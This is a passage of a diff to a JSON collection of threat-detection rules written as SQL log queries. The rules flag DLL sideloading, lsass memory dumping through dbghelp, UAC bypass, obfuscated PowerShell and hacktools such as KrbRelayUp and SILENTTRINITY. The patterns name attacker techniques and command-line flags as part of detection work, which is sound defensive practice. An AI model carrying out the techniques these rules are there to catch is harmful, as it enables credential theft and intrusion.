"828af599-4c53-4ed2-ba4a-a9f835c434ea", "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "author": "Florian Roth (Nextron Systems)", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. 
An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ + "attack.persistence", "attack.defense_evasion", + "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", - "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", "status": "test", - "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", - "author": "@neu5ron", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network 
back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + ], + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + }, + { + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1070", "attack.persistence", - "attack.t1542.003" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], 
- "level": "medium", + "falsepositives": [ + "Unlikely" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bcdedit_susp_execution.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", - "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", - "status": "test", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "VMGuestLib DLL Sideload", + "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "status": "experimental", + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "FP could occur if the legitimate version of vmGuestLib already exists on the system" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" + "filename": "image_load_side_load_vmguestlib.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "status": "test", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": 
"12827a56-61a4-476a-a9cb-f3068f191073", - "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "author": "Florian Roth (Nextron Systems)", + "title": "CLR DLL Loaded Via Office Applications", + "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "status": "test", + "description": "Detects CLR DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "image_load_office_dotnet_clr_dll_load.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": 
"410ad193-a728-4107-bc79-4419789fcbf8", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Rare System Admin Activity" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "status": "experimental", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. 
Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.lateral_movement" + 
"attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR 
